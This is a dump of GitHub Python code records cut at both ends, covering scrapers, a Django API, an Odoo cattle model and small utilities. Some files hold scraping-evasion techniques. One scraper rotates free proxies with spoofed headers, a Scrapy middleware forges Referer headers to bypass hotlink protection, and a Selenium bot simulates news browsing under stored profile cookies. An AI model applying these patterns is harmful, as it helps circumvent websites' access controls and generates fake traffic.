dsa.'\n","repo_name":"naeemhaq/tracker","sub_path":"api/tests/test_groups_resolver.py","file_name":"test_groups_resolver.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10288642545","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nInstall lxml before running using `pip install lxml`\n\n\"\"\"\n# Import necessary modules\nimport requests\nimport io\nimport csv\nimport random\nimport time\nfrom datetime import datetime\nfrom lxml import html\n\n\n\n# For collect and set proxies\nproxies = requests.get('https://www.proxy-list.download/api/v1/get?type=http')\n\nproxies = proxies.text.split('\\r\\n')\n\n\n\nhttp_proxy = random.choice(proxies)\nproxyDict = { \n \"http\" : 'http://' + http_proxy, \n \"https\" : 'http://' + http_proxy, \n\n }\n\n\n\n# Import APP ID's\nIMPORT_FILE_NAME = 'input.csv'\nips = []\nwith open(IMPORT_FILE_NAME, 'r') as csvFile:\n reader = csv.reader(csvFile)\n for row in reader:\n ips.append(row[0])\nprint('Total ip imported: ' + str(len(ips)))\n\n\n# Custom Header\nheaders = {'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest'}\n\n# Base URL(For creating session and extracting cookie)\nurl = 'https://www.whatismyip.com/ip-address-lookup/?iref=navbar'\n\n# Search or POST URL\nsearch_url = 'https://www.whatismyip.com/custom/response.php'\n\n# Creating Session\nsession = requests.Session()\n\n# Doing BASE GET requests\nr = session.get(url, headers=headers, proxies=proxyDict)\n\n\n\n\n# Here data points will be store\nip_list = []\ncountry_list = []\nstate_list = []\npostal_list = []\nisp_list = []\n\nfor i, ip_ in enumerate(ips):\n \n try:\n # Basic Clean up (Removing \\n and space)\n ip_ = str(ip_).replace('\\n','').replace(' ','')\n \n # Making paramas\n data = dict(ip=ip_, action='ip-lookup')\n \n # Extracting cookes\n __cfduid = r.cookies.get_dict()['__cfduid']\n __cfduid = '__cfduid=' + __cfduid\n \n dwqa_anonymous = r.cookies.get_dict()['dwqa_anonymous']\n dwqa_anonymous = 'dwqa_anonymous=' + dwqa_anonymous\n cookie_data = __cfduid + '; ' + dwqa_anonymous\n \n cookie_data = dict(Cookie=cookie_data)\n \n # Finalize header(merge)\n headers = {**headers, **cookie_data}\n \n # POST requests data\n r2 = session.post(search_url, data=data, headers=headers, proxies=proxyDict)\n \n # Making LXML object\n root = html.fromstring(r2.content)\n \n \n # Country Code\n country_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[6]/td[2]')[0].text)\n \n # State\n if root.xpath('div[1]/div[2]/table/tbody/tr[4]/td[2]')[0].text == '-':\n state_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[4]/td[2]')[0].text)\n else:\n state_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[4]/td[2]')[0].text)\n \n \n # ISP provider\n if root.xpath('div[1]/div[2]/table/tbody/tr[10]/td[2]')[0].text == '-':\n isp_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[10]/td[2]')[0].text)\n else:\n isp_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[10]/td[2]')[0].text)\n \n \n # Postal\n if root.xpath('div[1]/div[2]/table/tbody/tr[8]/td[2]')[0].text == '-':\n postal_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[8]/td[2]')[0].text)\n else:\n postal_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[8]/td[2]')[0].text)\n \n ip_list.append(ip_)\n \n \n print('Left: ' + str(len(ips)-i))\n # Random sleep for not putting pressure on server\n time.sleep(random.random())\n \n except Exception as e: \n print('Error: ' + str(e))\n print('id :' + str(ip_))\n pass\n \n\n# Zip data \ndata = [[a,b,c,d] for a,b,c,d in zip(ip_list, country_list, state_list, isp_list)]\n \n# Export to CSV \nEXPORT_FILE_NAME = 'output-' + \"{:%Y_%m_%d_%M_%S}\".format(datetime.now()) + '.csv' \nwith open(EXPORT_FILE_NAME, \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(data)\n\nprint(EXPORT_FILE_NAME + ' saved successfully.')\n\n \n \n \n \n \n","repo_name":"krypted/csviplookup","sub_path":"iplookup.py","file_name":"iplookup.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74067908853","text":"import logging\nimport pickle\nfrom datetime import datetime\nfrom random import randint\nfrom time import sleep\n\nfrom app.db.db import new_session\nfrom app.db.models import Cookies, Profile\nfrom selenium import webdriver\nfrom selenium.common import InvalidCookieDomainException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom sqlalchemy.orm import Session\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass NewsViewer:\n model_cls = Cookies\n base_url = \"https://news.google.com/\"\n\n def __init__(self, url: str, num: int):\n self.driver = None\n self.record = None\n self.domain = \"\"\n self.url = url\n self.num = num\n\n def load(self) -> str:\n with new_session() as session:\n self.record = session.query(Profile).filter(Profile.id == self.num).one()\n self.navigation(session)\n return f\"For profile {self.num} loaded news from {self.domain}\"\n\n def get_cookies(self, session: Session) -> list[dict]:\n cookies = (\n session.query(Cookies).filter(Cookies.profile_id == self.num).filter(Cookies.domain == self.domain).all()\n )\n if cookies:\n return pickle.loads(cookies[0].cookie)\n return []\n\n def add_cookies(self, cookie: list[dict]) -> None:\n for item in cookie:\n try:\n self.driver.add_cookie(item)\n except InvalidCookieDomainException as e:\n print(f\"{self.domain}\\n{e}\")\n\n def get_domain(self, url: str) -> None:\n self.driver.get(url)\n self.domain = self.driver.current_url.split(\"/\")[2]\n\n def navigation(self, session: Session) -> None:\n url = self.base_url + self.url.lstrip(\"./\")\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable_infobars\")\n options.add_argument(\"headless\")\n options.add_argument(\"window-size=1920x935\")\n options.add_argument(\"--kiosk\")\n options.add_argument(\"--log-level=3\")\n try:\n self.driver = webdriver.Chrome(chrome_options=options)\n self.get_domain(url)\n cookie = self.get_cookies(session)\n self.add_cookies(cookie)\n self.driver.get(url)\n self.news_viewer()\n self.update_cookies(session)\n finally:\n self.driver.close()\n\n def news_viewer(self) -> None:\n scroll_position = 0\n self.driver.implicitly_wait(15)\n try:\n WebDriverWait(self.driver, 10).until(\n EC.element_to_be_clickable((By.ID, (\"onetrust-accept-btn-handler\")))\n ).click()\n except TimeoutException:\n pass\n page_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n while scroll_position <= page_height:\n self.driver.execute_script(f\"window.scrollTo(0, {scroll_position})\")\n sleep(randint(0, 5))\n scroll_position += 400\n\n def update_cookies(self, session: Session) -> None:\n ck = pickle.dumps(self.driver.get_cookies())\n now = datetime.now()\n self.record.counter = self.record.counter + 1\n self.record.last_update = now\n cookies = self.get_cookies(session)\n if not cookies:\n cookies_instance = self.model_cls(cookie=ck, domain=self.domain, profile_id=self.record.id)\n session.add(cookies_instance)\n logger.info(f\"Cookies for {self.num} and {self.domain} was created\")\n else:\n cookies.cookie = ck\n logger.info(f\"Cookies for {self.num} and {self.domain} was updated\")\n","repo_name":"valentinepit/g_news","sub_path":"app/parser/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34271463802","text":"import logging\n\nfrom discord_bot import DiscordBot\nfrom scraper import Scraper\n\nclass Store:\n def __init__(self, name, css_selector, validator_url, urls_to_check):\n self.name = name\n self.css_selector = css_selector\n self.validator_url = validator_url\n self.urls_to_check = urls_to_check\n\n def check_sanity(self):\n soup = Scraper.fetch_url(self.validator_url)\n found = soup.select(self.css_selector)\n if found:\n DiscordBot.send(f\"{self.name} css selector is valid\")\n return True\n else:\n DiscordBot.send(f\"{self.name} css selector is invalid\")\n return False\n\n def check_availability(self):\n for url in self.urls_to_check:\n soup = Scraper.fetch_url(url)\n found = soup.select(self.css_selector)\n if found:\n DiscordBot.send(f\"In Stock: {url}\")\n else:\n logging.info(f\"{self.name} no stock\")\n","repo_name":"kaili302/MyOnlineShoppingTool","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36805893203","text":"'''\nBen Langley\nOctober 24th, 2018\n\nVentera Dev Challenge\n\nDescription: This file reads in the JSON (in new format), analyzes certain metrics\nand displays the results in the command line for the user\n'''\nfrom transform import transform\n\n######################\n## Global Variables ##\n######################\ninputJSONFile = \"data.json\"\noutputJSONFile = \"transformed.json\"\n\n'''\nClass to wrap the vendor data \n\nThese methods were added to the class because most of them\nrequired the data attribute so I abstracted it away into this\nnew class to store the Vendor Data\n'''\nclass VendorData(object):\n\n\t'''\n\tInitalize the vendor data instance with the given data\n\t'''\n\tdef __init__(self, data):\n\t\tself.data = data\n\n\t'''\n\tGet a list of unique vendor names\n\n\treturns list of unique vendors\n\t'''\n\tdef getVendorNames(self):\n\t\tnames = [] # List to store names in\n\n\t\t# Loop over each transaction and get the vendor name\n\t\tfor item in self.data:\n\t\t\tnames.append(item[\"vendor\"])\n\n\t\t# Remove duplicates by making a set then back to a list\n\t\treturn list(set(names))\n\n\n\t'''\n\tCompute the total revenue of each vendor\n\n\treturns dictionary of each vendor and their total revenue\n\t'''\n\tdef computeTotalRevenueByVendor(self):\n\t\t# Initialize the revenue data structure\n\t\trevenue = {}\n\t\tfor vendor in self.getVendorNames():\n\t\t\trevenue[vendor] = 0\n\n\t\t# Compute total revenue of all vendors\n\t\tfor transaction in self.data:\n\t\t\tvendor = transaction[\"vendor\"]\n\n\t\t\t# Get the transaction total revenue\n\t\t\tfor item in transaction[\"details\"]:\n\t\t\t\trevenue[vendor] += item[\"revenue\"]\n\n\t\treturn revenue\n\n\n\t'''\n\tGet the vendor with the heightest revenue\n\n\trevenueDict - dictionary of total revenue by vendor\n\t\tOutput of computeTotalRevenueByVendor()\n\treturns the name of the vendor witht he heighest revenue\n\t'''\n\tdef getHeighestRevenueVendor(self, revenueDict):\n\t\t# Initialize the maximums\n\t\tmaxKey = \"\"\n\t\tmaxRevenue = 0\n\n\t\t# Find maximum value and return key by iterating over\n\t\t# each (vendor, revenue) pair in the dictionary\n\t\tfor vendor, revenue in revenueDict.items():\n\t\t\tif (revenue > maxRevenue):\n\t\t\t\tmaxRevenue = revenue\n\t\t\t\tmaxKey = vendor\n\n\t\t# Return vendor of the maximum revenue\n\t\treturn maxKey\n\n\n\t'''\n\tCompute the total number of sales for a specific item\n\n\titemKey - the exact key to match for computing number of items sold\n\treturns the total number of items sold for the given item key\n\t'''\n\tdef computeItemsSold(self, itemKey):\n\t\t# Initialize the items sold counter \n\t\ttotal = 0\n\n\t\t# Iterate over each transaction\n\t\tfor transaction in self.data:\n\t\t\t# Iterate over each item in transaction\n\t\t\tfor item in transaction[\"details\"]:\n\t\t\t\tif (item[\"item\"] == itemKey):\n\t\t\t\t\ttotal += item[\"quantity\"]\n\n\t\treturn total\n\n\n\t'''\n\tFind the customer who bought the most of a specific item in given month\n\n\titemKey - the exact key to match for the item to find customer for\n\tmonth - the integer month to verify transactions in\n\treturns the customerID who bought the most of the item given by itemKey\n\t'''\n\tdef customerBoughtMostItem(self, itemKey, month):\n\t\t# Initialize a dictionary of customers to store ID and matching items bought\n\t\tcustomersDict = {}\n\n\t\t# Iterate over each transaction to populate customers dict\n\t\tfor transaction in self.data:\n\t\t\tcustomerID = transaction[\"customerID\"]\n\t\t\t# Verify month is correct\n\t\t\ttrans_month = int(transaction[\"date\"][0:2])\n\t\t\tif (trans_month == month):\n\t\t\t\t# Continue checking for item in transaction\n\t\t\t\tfor item in transaction[\"details\"]:\n\t\t\t\t\t# Verify correct item\n\t\t\t\t\tif (item[\"item\"] == itemKey):\n\t\t\t\t\t\t# Update the customer dict\n\t\t\t\t\t\tif customerID in customersDict:\n\t\t\t\t\t\t\tcustomersDict[customerID] += item[\"quantity\"]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcustomersDict[customerID] = item[\"quantity\"]\n\n\t\t# Find customer with max\n\t\tmaxCustomer = \"\"\n\t\tmaxItems = 0\n\n\t\t# Find maximum value and return key by iterating over\n\t\t# each (customer, items count) pair in the dictionary\n\t\tfor customer, items in customersDict.items():\n\t\t\tif (items > maxItems):\n\t\t\t\tmaxItems = items\n\t\t\t\tmaxCustomer = customer\n\n\t\t# Return customer of the maximum items bought\n\t\treturn maxCustomer\n\n\n'''\nMain function to run the data provided for the challenge\n'''\ndef main():\n\t# Get the data in the transformed form\n\tdata = transform(inputJSONFile, outputJSONFile)\n\n\t# Create the Vendor Data object\n\tvendor_data = VendorData(data)\n\tvendor_revenue = vendor_data.computeTotalRevenueByVendor()\n\n\t# Print the challenge specific data\n\tprint(\"Total Revenue: \", sum(vendor_data.computeTotalRevenueByVendor().values()))\n\tprint(\"Vendor with Heighest Revenue: \", vendor_data.getHeighestRevenueVendor(vendor_revenue))\n\tprint(\"Quantity of Hats Sold: \", vendor_data.computeItemsSold(\"hat\"))\n\tprint(\"Customer who Bought Most Ice (October): \", vendor_data.customerBoughtMostItem(\"ice\", 10))\n\t\n# Run the method!\nmain()\n\n","repo_name":"venterachallenge/Langley_Dev_Challenge","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42953538330","text":"from awadb import AwaEmbedding\nfrom typing import Iterable, Any, List\nimport os\nimport numpy as np\n\nDEFAULT_MODEL_NAME = \"text-embedding-ada-002\"\n\nclass OpenAIEmbeddings(AwaEmbedding):\n def __init__(self):\n try:\n import openai\n except ImportError as exc:\n raise ImportError(\n \"Could not import openai python package. \"\n \"Please install it with `pip install openai`.\"\n ) from exc\n self.model = openai.Embedding\n self.tokenizer = None\n openai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\n def Embedding(self, sentence):\n tokens = []\n if self.tokenizer != None:\n tokens = self.tokenizer.tokenize(sentence)\n else:\n tokens.append(sentence)\n ans = self.model.create(input = tokens[0], model = DEFAULT_MODEL_NAME)[\"data\"][0][\"embedding\"]\n return np.array(ans)\n\n def EmbeddingBatch(\n self,\n texts: Iterable[str],\n **kwargs: Any,\n ) -> List[List[float]]:\n results: List[List[float]] = []\n for text in texts:\n results.append(self.model.create(input = text, model = DEFAULT_MODEL_NAME)[\"data\"][0][\"embedding\"])\n return results","repo_name":"awa-ai/awadb","sub_path":"awadb/awa_embedding/openai.py","file_name":"openai.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"21"} +{"seq_id":"22168395304","text":"\"\"\"\nCommon functionality of training a network under different frameworks.\n\"\"\"\n\nimport os\n\nfrom kernelphysiology import commons\n\nfrom kernelphysiology.utils.path_utils import create_dir\n\n\ndef prepare_output_directories(dataset_name, network_name, optimiser,\n load_weights, experiment_name, framework):\n # preparing directories\n data_folder_path = os.path.join(commons.python_root, 'data')\n create_dir(data_folder_path)\n network_folder_path = os.path.join(data_folder_path, 'nets')\n create_dir(network_folder_path)\n framework_folder_path = os.path.join(network_folder_path, framework)\n create_dir(framework_folder_path)\n\n # organise the dataset according to their parents\n if 'wcs' in dataset_name:\n dataset_parent = 'wcs'\n elif 'voc' in dataset_name:\n dataset_parent = 'voc'\n dataset_name = dataset_name.replace('voc_', '')\n elif 'geetup' in dataset_name:\n dataset_parent = 'geetup'\n dataset_name = dataset_name.replace('geetup_', '')\n else:\n dataset_parent = ''.join([i for i in dataset_name if not i.isdigit()])\n dataset_parent_path = os.path.join(framework_folder_path, dataset_parent)\n\n create_dir(dataset_parent_path)\n dataset_child_path = os.path.join(dataset_parent_path, dataset_name)\n create_dir(dataset_child_path)\n network_parent_path = os.path.join(dataset_child_path, network_name)\n create_dir(network_parent_path)\n network_dir = os.path.join(network_parent_path, optimiser)\n create_dir(network_dir)\n if load_weights is not None and load_weights is True:\n f_s_dir = os.path.join(network_dir, 'fine_tune')\n else:\n f_s_dir = os.path.join(network_dir, 'scratch')\n create_dir(f_s_dir)\n save_dir = os.path.join(f_s_dir, experiment_name)\n create_dir(save_dir)\n return save_dir\n","repo_name":"ArashAkbarinia/kernelphysiology","sub_path":"python/src/kernelphysiology/dl/utils/prepare_training.py","file_name":"prepare_training.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25723867752","text":"from django.urls import path\n#from rest_framework.routers import DefaultRouter\n# from watchlist_app.api.views import movie_list, movie_details\nfrom xtank.api.views import (pitch_list, pitch_detail,counteroffer)\n\n\n\nurlpatterns = [\n path('pitches/', pitch_list, name='pitch-list'),\n path('pitches//', pitch_detail, name='pitch-detail'),\n path('pitches//makeOffer', counteroffer, name='counteroffer'),\n\n \n\n]","repo_name":"Shalvi-Singhal/xharktank-backend","sub_path":"XharkTank/xtank/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42630988673","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\n\n\n\n'''\n中间件处理图片下载的防盗链\n'''\nclass ImageHotlinkingmiddleware(object):\n def process_request(self,request,spider):\n referer = request.meta.get('referer',None)\n if referer:\n request.headers['referer'] = referer\n else:\n request.headers['referer'] = 'http://i.meizitu.net'\n\n\nimport random\nfrom .useragent import agents\nfrom scrapy.downloadermiddlewares.useragent import UserAgentMiddleware\n'''\n代理\n'''\nclass UserAgentmiddleware(UserAgentMiddleware):\n def process_request(self, request, spider):\n agent = random.choice(agents)\n request.headers['User-Agent'] = agent","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"meizi_scrapy/meizi_scrapy/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9984250122","text":"# ch20_50.py\nimport pandas as pd\n\nitems = ['軟體','書籍','國際證照']\nJan = [200, 150, 80]\nFeb = [220, 180, 100]\nMarch = [160, 200, 110]\nApril = [100, 120, 150]\ndf = pd.DataFrame([Jan, Feb, March, April],\n columns = items,\n index = range(1,5))\ndf.to_excel(\"out20_50a.xlsx\")\ndf.to_excel(\"out20_50b.xlsx\", header=False, index=False)\n\n\n\n\n\n\n\n\n\n","repo_name":"June0608/Python","sub_path":"Program Examples/ch20/ch20_50.py","file_name":"ch20_50.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38528437306","text":"# 24060_알고리즘 수업_병합정렬_mergesort\r\nimport sys\r\n\r\ndef msort(li):\r\n if len(li) <= 1:\r\n return li\r\n mid = (len(li)+1)//2\r\n l_li = li[:mid]\r\n r_li = li[mid:]\r\n\r\n l_li = msort(l_li)\r\n r_li = msort(r_li)\r\n\r\n s_li = []\r\n i, j = 0, 0\r\n while i < len(l_li) and j < len(r_li):\r\n if l_li[i] < r_li[j]:\r\n s_li.append(l_li[i])\r\n count.append(l_li[i])\r\n i += 1\r\n else:\r\n s_li.append(r_li[j])\r\n count.append(r_li[j])\r\n j += 1\r\n while i < len(l_li):\r\n s_li.append(l_li[i])\r\n count.append((l_li[i]))\r\n i += 1\r\n while j < len(r_li):\r\n s_li.append(r_li[j])\r\n count.append(r_li[j])\r\n j += 1\r\n return s_li\r\n\r\n\r\nn, k = map(int, sys.stdin.readline().split())\r\n\r\nnli = list(map(int, sys.stdin.readline().split()))\r\ncount = [] # 각 회차별 append되는 항목을 알기 위해 선언\r\nmsort(nli)\r\n\r\nif len(count) < k:\r\n print(-1)\r\nelse:\r\n print(count[k-1])\r\n\r\n\r\n\r\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"백준/Silver/24060. 알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"si","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74288801653","text":"import Race\n\nclass Angel(Race.Race):\n \n def __init__(self, exp = 0, amount = 1):\n self.name = \"Angel\" \n self.hp = 75\n self.atk = 5\n self.defense = 5\n self.atkSpd = 2\n self.intel = .55\n self.birRate = .05\n self.evo = 100\n self.exp = exp\n self.tier = 1\n self.amount = amount\n\n \nclass HighAngel(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"High Angel\" \n self.hp = 125\n self.atk = 9.5\n self.defense = 8.5\n self.atkSpd = 2\n self.intel = .65\n self.evo = 200\n self.exp = exp\n self.tier = 2\n self.amount = amount\n\nclass Throne(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Throne\" \n self.hp = 175\n self.atk = 13\n self.defense = 12\n self.atkSpd = 2\n self.intel = .75\n self.evo = 400\n self.exp = exp\n self.tier = 3\n self.amount = amount\n\nclass Cherubim(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Cherubim\" \n self.hp = 225\n self.atk = 16\n self.defense = 14\n self.atkSpd = 2\n self.intel = .85\n self.evo = 1750\n self.exp = exp\n self.tier = 4\n self.amount = amount\n\nclass Seraphim(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Seraphim\" \n self.hp = 400\n self.atk = 20\n self.defense = 16\n self.atkSpd = 2\n self.intel = .65\n self.exp = exp\n self.tier = 5\n self.amount = amount\n","repo_name":"areebia/Evolution","sub_path":"Angel.py","file_name":"Angel.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29932450840","text":"from django.contrib.admin import ModelAdmin, register\n\nfrom .models import Subscribe, User\n\n\n@register(User)\nclass UserAdmin(ModelAdmin):\n \"\"\"Админка пользователей.\"\"\"\n list_display = (\n 'username',\n 'email',\n 'first_name',\n 'last_name'\n )\n search_fields = ('username', 'email', 'first_name', 'last_name',)\n list_filter = ('email', 'username', )\n ordering = ('date_joined',)\n empty_value_display = '-'\n\n\n@register(Subscribe)\nclass SubscribeAdmin(UserAdmin):\n \"\"\"Админка подписок.\"\"\"\n list_display = (\n 'username',\n 'get_subscribe',\n )\n empty_value_display = '-'\n\n def get_subscribe(self, obj):\n return ',\\n'.join([p.username for p in obj.subscribe.all()])\n get_subscribe.short_description = 'подписки'\n","repo_name":"nasretdinovs/Foodgram","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6638116173","text":"import sys\n\nfrom fate_flow.web_server.pipeline_wrapper.test import prepare\n\nsys.path.append(\"./\")\nfrom fate_flow.web_server.pipeline_wrapper import wrapper\n\nCOMMON_PARAM = {\"transform_col_indexes\": None, \"transform_col_names\": [\"sex\"], \"need_run\":True}\nMODULE = \"OneHotEncoder\"\n\n\ndef base(jobid):\n global COMMON_PARAM\n wrapper.t_(jobid, MODULE, guest_only_param=COMMON_PARAM, host_only_param={10000:{\"transform_col_indexes\": None,\n \"transform_col_names\": [\"sex\"], \"need_run\":False}}, ml=False)\n\n\nif __name__ == \"__main__\":\n jid = prepare.a_jobid()\n # jobid = \"202303080032028318590\"\n base(jid)\n","repo_name":"Seceum/SeceumFL","sub_path":"fateflow/python/fate_flow/web_server/pipeline_wrapper/test/one_hot_encoder.py","file_name":"one_hot_encoder.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"70280374772","text":"import pandas as pd\n\ndef simplyfy_categories(data):\n # Fill missing categories with 'Unknown'\n data['Categories'].fillna('Unknown', inplace=True)\n\n # Simplify categories - we will only use the top-level category\n data['main_category'] = data['Categories'].apply(lambda x: x.split('|')[0].strip())\n\n # Apply one-hot encoding\n categories_encoded = pd.get_dummies(data['main_category'], prefix='category')\n data = pd.concat([data, categories_encoded], axis=1)\n return data\n","repo_name":"Austin-Fulbright/price_optv1.1","sub_path":"preprocessor/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25084347321","text":"import sys\nimport argparse\nfrom clean_and_token_text import normalize_text\n\ndef deal_with_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('embed4', choices=['embed4classif', 'embed4ner'],\n help='choose between classification (removes all punct) or ner cleaning')\n parser.add_argument('--in_files', type=str, default=None,\n help='read a file to clean e.g. infile.txt')\n parser.add_argument('--out_file', type=str, default=None,\n help='file name to output the clean text e.g. outfile.txt')\n #parser.add_argument('--skip_n', default=1, type=int)\n args = parser.parse_args()\n return args\n\n\ndef main1():\n if sys.stdin.isatty():\n print('not piped me')\n else:\n # this is the case where we need to read\n text = sys.stdin.read()\n\n args = deal_with_args()\n if args.embed4 == 'embed4classif':\n clean_text = normalize_text(text, 'rm_punct')\n elif args.embed4 == 'embed4ner': \n clean_text = normalize_text(text)\n else:\n raise NotImplementedError('I dont know what the embed4 value means')\n print(clean_text)\n\nif __name__ == '__main__':\n main1()\n\n\n","repo_name":"lab156/arxivDownload","sub_path":"embed/run_normalize.py","file_name":"run_normalize.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40364440314","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date,datetime\n\nclass sapi(models.Model):\n _name = \"sapi\"\n _description = \"Sapi\"\n _inherits = {\"res.partner\": \"partner_id\"}\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _rec_name = 'first_name'\n\n @api.depends('date_of_birth')\n def onchange_age(self):\n for rec in self:\n if rec.date_of_birth:\n d1 = rec.date_of_birth\n d2 = datetime.today().date()\n rd = relativedelta(d2, d1)\n rec.age = str(rd.years) + \"y\" +\" \"+ str(rd.months) + \"m\" +\" \"+ str(rd.days) + \"d\"\n else:\n rec.age = \"No Date Of Birth!!\"\n\n partner_id = fields.Many2one('res.partner', 'Partner',\n required=True, ondelete=\"cascade\")\n patient_id = fields.Many2one('medical.patient')\n first_name = fields.Char('Name', size=128, translate=True)\n middle_name = fields.Char('Middle Name', size=128, translate=True)\n last_name = fields.Char('Last Name', size=128, translate=True)\n date_of_birth = fields.Date('Birth Date')\n blood_group = fields.Selection([\n ('A+', 'A+ve'),\n ('B+', 'B+ve'),\n ('O+', 'O+ve'),\n ('AB+', 'AB+ve'),\n ('A-', 'A-ve'),\n ('B-', 'B-ve'),\n ('O-', 'O-ve'),\n ('AB-', 'AB-ve')\n ], string='Blood Group')\n sex = fields.Selection([\n ('m', 'Male'),\n ('f', 'Female'),\n ('o', 'Other')\n ], 'Gender', required=True, default='m')\n id_number = fields.Char('ID Card Number', size=64)\n user_id = fields.Many2one('res.users', 'User', ondelete=\"cascade\")\n category_id = fields.Many2one('op.category', 'Category')\n active = fields.Boolean(default=True)\n emergency_contact = fields.Many2one('res.partner', 'Emergency Contact')\n kandang_id = fields.Many2one('kandang.sapi.perah', 'Kandang')\n ibu_id = fields.Char('ID Sapi Ibu')\n ayah_id = fields.Char('ID Sapi Ayah')\n bobot = fields.Integer( string='Bobot Kg')\n panjang = fields.Integer('Panjang cm')\n kondisi_sapi = fields.Char('Kondisi Sapi')\n jenis_sapi = fields.Many2one('jenis.sapi.master', 'Jenis Sapi')\n eartag_id = fields.Char('ID Ear Tag')\n jenis_id = fields.Char(related='jenis_sapi.id_jenis_sapi', string=\"ID Jenis Sapi\")\n keterangan = fields.Text(related=\"jenis_sapi.keterangan\", string=\"Keterangan\")\n tgl_kematian = fields.Datetime('Tanggal Kematian')\n alasan = fields.Char('Alasan')\n sehat = fields.Boolean('Sehat')\n sakit = fields.Boolean('Sakit')\n hamil = fields.Boolean('Hamil')\n tdk_hamil = fields.Boolean('Tidak Hamil')\n state = fields.Selection([\n ('kering', 'Kering'),\n ('laktasi', 'Laktasi'),\n ], string='State', readonly=True, default='kering', required=True)\n ibu_titipan = fields.Char('Ibu Titipan')\n jenis_kehamilan = fields.Selection([\n ('ib', 'IB'),\n ('alami', 'Alami'),\n ], string='Jenis Kehamilan', required=False)\n height = fields.Integer('Tinggi cm')\n lgkr_perut = fields.Integer('Lingkar Perut cm')\n peternak_id = fields.Many2one('peternak.sapi', 'Peternak')\n age = fields.Char(compute=onchange_age, string=\"Age\", store=True)\n tipe = fields.Selection([\n ('1', 'Induk'),\n ('2', 'Dara'),\n ('3', 'Pedet Btn'),\n ], string='Tipe', required=True)\n posisi_eartag = fields.Selection([\n ('kanan', 'Kanan'),\n ('kiri', 'Kiri')\n ], string='Posisi Eartag')\n kembar = fields.Selection([\n ('y', 'Ya'),\n ('t', 'Tidak')\n ], string='Kembar')\n metoda = fields.Char('Metoda')\n tgl_identifikasi = fields.Date('Tanggal Identifikasi')\n 